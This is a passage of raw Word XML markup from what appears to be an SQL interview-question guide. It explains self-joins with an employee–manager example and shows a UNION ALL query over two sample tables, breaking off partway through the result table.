          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Use Case</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: It is useful when there is a hierarchical relationship within the table or when we need to compare rows within the same table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793C5E79"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ample Scenario:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C012DC0"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Consider an Employee table where each employee has a manager. The manager_id field in the Employee table points to the employee_id of the employee's manager. A self-join can help us find the employees and their respective managers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7444DC43"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ample Table: Employe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63"/>
        <w:gridCol w:w="686"/>
        <w:gridCol w:w="1165"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="098A0180" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10C2FB6A"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ployee_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2333DBC4"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name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1782A1E8"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manager_id</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="7B7E33CE" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0E68322B"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E59449B"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51A9D5DC"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NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="1773FC11" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="339672B4"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DBB2973"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0031F440"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="445B52BC" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5799D039"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42D5FDD2"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Bob</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2677288C"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="77871DC1" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E81C1E5"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="52F878F5"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Charlie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="21453821"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="158D782A"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elf-join SQL Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F47B141"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lastRenderedPageBreak/>
        <w:t>To get a list of employees along with their manager's name:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C680E30"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SELECT e1.name AS employee_name, e2.name AS manager_name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EF51FC8"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FROM Employee e1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD0F50E"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LEFT JOIN Employee e2 ON e1.manager_id = e2.employee_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4755D2CE"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="428515EF"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We use two aliases (e1 and e2) for the same Employee table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A73749"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e1 represents the employee, and e2 represents the manager (the second instance of the Employee table).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5800AD9B"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We join the table on e1.manager_id = e2.employee_id to get the manager for each employee.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D10F517"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The LEFT JOIN ensures that even employees without managers (like John) will be included, with NULL as their manager's name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E974EC4"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Resul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07"/>
        <w:gridCol w:w="1509"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="40EC41B5" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DB5A620"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mployee_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0CB2C2EA"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manager_name</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="09A0CCBF" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42A18728"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49CAF188"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NULL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="68922912" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78DB62CC"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="136A1AC8"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="581E1FDE" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4A3E7D24"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Bob</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5A53B39B"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John</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="0C13301F" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16B96A55"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Charlie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6230FAD2"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Alice</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5729C2F8"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Use Cases of Self-Join:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78297649"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Hierarchical Data</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: For example, an employee-manager relationship or parent-child relationships.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69ABD8AF"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Comparison within the Same Table</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When comparing records within the same table, such as comparing an employee's salary with others in the same department.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A4AFAF"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Data Duplication</w:t>
      </w:r>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: To find records in a table that match with others under certain conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48F47496"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6529782E"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A self-join allows you to retrieve data from a table by joining it with itself. It is a powerful technique when dealing with hierarchical or relational data within the same table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712376F8" w14:textId="0B7E3752"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5604A6C2">
          <v:rect id="_x0000_i3053" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="668A5E3E" w14:textId="5201BFEC" w:rsidR="00564F5D" w:rsidRPr="00CE4B95" w:rsidRDefault="003A4D19">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="754" w:name="_Toc196308234"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL Query - </w:t>
      </w:r>
      <w:r w:rsidR="00701CCE" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>We have Table A (2 columns and 4 rows) and Table B (2 columns and 4 rows) and I want to print all 8 rows? Write a query for it? (Use Union All)</w:t>
      </w:r>
      <w:r w:rsidR="00564F5D" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="754"/>
    </w:p>
    <w:p w14:paraId="6C3C5C67" w14:textId="63B366C6" w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w:rsidRDefault="003A4D19" w:rsidP="005C1C9E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005C1C9E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>To print all 8 rows from both Table A and Table B using the UNION ALL operator, you can write the following SQL query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B1D087"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QL Query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A99C7A6"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SELECT * FROM TableA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588D07C4"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UNION ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356FC996"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SELECT * FROM TableB;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C95621A"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planation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E1346C"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UNION ALL: This operator combines the result sets of the two SELECT queries and includes all rows from both tables. Unlike UNION, UNION ALL does not eliminate duplicate rows. So, if there are duplicate rows between the two tables, they will be included in the result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA4D6D2"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SELECT *: This selects all columns from both TableA and TableB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D209FC"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ample:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D5DE43"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Assume the following data:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BCA8BF"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Table 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66"/>
        <w:gridCol w:w="866"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="6759B13A" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34A2A39E"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column1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5E6BC461"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column2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="4D7A25E8" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="76F0DECD"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A1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11A04B6C"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B1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="4D999F82" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="620D0D8C"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A2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29CD8CA7"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B2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="703C3BAA" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="19892AF3"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A3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E417542"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B3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="202B952B" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51C9EF07"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A4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4AE3CC90"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B4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="430658D4"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Table B:</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66"/>
        <w:gridCol w:w="866"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="373174C8" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="658A9E6C"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column1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="11EC742C"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column2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="59A4D74D" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7F59EA5A"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B1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="37808CC3"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C1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="4D4615BC" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="23E4833C"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B2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="108B5B9B"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C2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="15F7870D" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14BCB1A1"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B3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25F72948"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C3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="2F76FB4F" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5404B3AC"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lastRenderedPageBreak/>
              <w:t>B4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="536D9EEE"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C4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0293E04B"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The result of the query will be:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E104182"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Resul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66"/>
        <w:gridCol w:w="866"/>
      </w:tblGrid>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="25F9365A" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="50AE1522"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column1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="416DA254" w14:textId="77777777" w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w:rsidRDefault="003A4D19"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column2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="728C213C" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64A6D942"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A1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6FE9AC83"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B1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="22811BA8" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="04E4008C"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A2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39F5B72D"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B2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="5EEF8273" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4E0EBB7F"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A3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="263BCB35"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B3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003A4D19" w:rsidRPr="005C1C9E" w14:paraId="761DB962" w14:textId="77777777" w:rsidTr="003A4D19">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="256C5995"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A4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="48B580DF"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B4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
